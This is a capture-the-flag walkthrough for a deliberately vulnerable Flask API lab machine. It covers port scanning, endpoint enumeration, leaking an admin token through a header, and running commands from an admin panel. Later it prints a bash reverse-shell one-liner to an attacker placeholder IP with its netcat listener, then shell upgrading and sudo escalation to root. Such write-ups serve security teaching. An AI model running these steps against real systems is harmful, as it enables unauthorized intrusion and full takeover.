Vulnerable API App

Target Details

  • Target IP: 10.10.149.135

Service Discovery

  • Scan Open ports using nmap

    $ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
Nmap scan report for 10.10.149.135
Host is up (0.45s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
|   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
|_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.18.0 (Ubuntu)
5000/tcp open  upnp?
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.1 400 Bad Request
...

...
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   354.40 ms 10.2.0.1
2   ... 3
4   447.88 ms 10.10.149.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

  • Services Found:

Service
Port
Version

SSH

22

OpenSSH 8.2p1

nginx HTTP

80

/1.18.0

Web Service

5000

Unknown

  • Answer the Task questions

Content Discovery

  • Visit the web application in browser

  • Common endpoints are /api or api.domain.com,

    /api worked!

  • We can find other endpoints by manually by crawling through the web application with burpsuite proxy running

  • On inspecting the html, the admin has left a message in webpage comment for the hacker!

    <!--     
This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API!
If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint!

- vuln admin
-->

    from comment we can make conclusion that, we cannot directly sign up from the login page, we need to find api endpoint to sign up. admin has also provided hint to the endpoint for users sign up

  • On visiting /api/users endpoint, we get json response, providing information about other users!!

    {
  "users": [
    {
      "userid": 1,
      "first_name": "Martin",
      "last_name": "Rodriguez",
      "admin": false
    },
    {
      "userid": 2,
      "first_name": "Kristen",
      "last_name": "Martin",
      "admin": false
    },
    ....
    {
      "userid": 27,
      "first_name": "Derek",
      "last_name": "Washington",
      "admin": true
    }
  ]
}

    We got user details names, user Id and their role while using the application

  • In most of the cases, endpoint supports various http methods, let's verify it using OPTIONS method. Let's visit the same users enpoint and send the request to repeater this time, and change HTTP method from GET to POST

    GET /api/users HTTP/1.1

# change to
OPTIONS /api/users HTTP/1.1

  • On visiting dmdhrumilmistry GitHub Profile repos, Vulnerable-API-App app.py file, we can retrieve all the endpoints from the file. The useful ones for now are listed below.

  • Endpoints Discovered using burpsuite

Endpoint
HTTP Methods Allowed

/api/users/

DELETE, HEAD, OPTIONS, GET

/api/users

POST, OPTIONS, HEAD, GET

Exploit Endpoints

  • from /api/user/<userid:int> endpoint we can get user details, from /api/users endpoint we can retrieve admin user id and try to get their account details. For my case admin id is 27.

    admin id will vary

  • Send Burp Request to /api/user/27, we'll receive json response as

    {
  "admin": true,
  "first_name": "Derek",
  "last_name": "Washington",
  "userid": 27
}

  • Using first question hint, we know that we need to send Hide-Info header in the HTTP request.

    • Burp Request

    GET /api/user/27 HTTP/1.1
Hide-Info: 0

    • Burp Json Response

    {
  "admin": true,
  "email": "admin@vuln-api-app.com",
  "first_name": "Derek",
  "last_name": "Washington",
  "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw",
  "userid": 27
}

    Now we've received token

  • We can add token in BurpSuite every request using Custom Header Extension, Refer docs for installation and usage, then add authorization token to extension.

  • Now, Add http://10.10.149.135:5000, and capture in scope requests only.

  • configure Custom Header extension to add header while using proxy using

    • Project Options

    • Sessions

    • From Session Handling rules click on add button

    • provide description

    • Click on Add button from Rule Actions

    • Choose Invoke Burp Extension

    • Set extension handler to Add Custom Header

    • Click on OK

    • From Scope tab, click on Proxy checkbox to add headers while using proxy. Also set URL scope to set Suite Scope

    • Click on OK

  • Visit HomePage http://10.10.149.135:5000

Get Target Machine Shell

  • Visit HomePage, with login admin auth token

  • From HomePage, visit Admin Controls tab, from where we can run bash commands

  • Using GTFObins Bash Reverse Shell get access to reverse shell

  • Start Netcat on attacker's machine

    nc -nlvp 4444

  • Enter below command in command input field

    bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'

  • On Execution of command, we get a reverse shell on the attacker machine

    $ nc -nlvp 4444
listening on [any] 4444 ...
connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
bash: cannot set terminal process group (610): Inappropriate ioctl for device
bash: no job control in this shell
vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$

Get User Flag

  • Read User Flag

    vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
THM{REDACTED}

Privilege Escalation

  • Checking if vulnadmin has sudo permissions

    vulnadmin@vulnapiapp:~$ groups
sudo adm cdrom dip plugdev lxd

    vulnadmin has sudo permission, but first we need to find its password to run sudo command

  • On Listing Files in vulnadmin home directory, we find a backup.txt file

    vulnadmin@vulnapiapp:~$ ls -l
total 12
-rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
-rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt

  • On Reading file, it seems to be encoded in base64 format

  • Decode backup.txt file

    vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d
{REDACTED}

    It's password for vulnadmin account

  • To run sudo command we need to spawn terminal first, since the deployed application is running flask which is a python framework, python must be installed which can be verified using

    vulnadmin@vulnapiapp:~$ python3 --version
Python 3.8.10

  • Get Interactive Shell

    vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'

  • List commands which can be run as with root privileges by vulnadmin

    vulnadmin@vulnapiapp:~$ sudo su
[sudo] password for vulnadmin: {REDACTED}
root@vulnapiapp:/home/vulnadmin/#

  • Get Root Flag

    root@vulnapiapp:~# cat /root/root.txt
cat /root/root.txt
THM{REDACTED}

  • We've successfully Rooted the machine!!

PreviousAgent TNextGit-Happens

Last updated